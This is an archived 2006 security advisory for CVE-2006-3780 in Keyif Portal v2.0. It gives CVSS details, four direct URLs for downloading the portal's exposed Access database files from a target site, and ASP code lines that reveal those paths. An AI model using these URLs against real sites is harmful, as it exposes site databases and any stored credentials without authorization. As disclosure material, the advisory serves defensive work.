Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download

2006.07.26

Credit: x0r0n

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-3780

CWE: CWE-Other

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

title : Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download

-

script site : http://www.keyifweb.com/

-

Discovered : xoron

-

Cont@ct    : x0r0n (at) hotmail (dot) com [email concealed]

-

Exploit    : http://www.target.com/[path]/A9S7G6ASD790/ANKET/anket.mdb

http://www.target.com/[path]/A9S7G6ASD790/HABER/keyifweb.mdb

http://www.target.com/[path]/A9S7G6ASD790/ASP/download.mdb

http://www.target.com/[path]/A9S7G6ASD790/SAYAC/aktif.mdb

-

Code:

SAYAC

Veri_yolu = Server.MapPath("database/A9S7G6ASD790/SAYAC/aktif.mdb")

Bcumle = "DRIVER={Microsoft Access Driver (*.mdb)};DBQ=" & Veri_yolu

-----

ASP

Sur.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/A9S7G6ASD790/ASP/download.mdb")

-----

ANKET

vt_yol = server.mappath("database/A9S7G6ASD790/ANKET/anket.mdb")

Set bag = CreateObject("ADODB.Connection")

-----

DOWNLOAD

Set Sur = Server.CreateObject("ADODB.Connection")

Sur.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/A9S7G6ASD790/ASP/download.mdb")

-

XORON - Cyber-Warrior.Org /// special thanx R3D4C!D :)

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.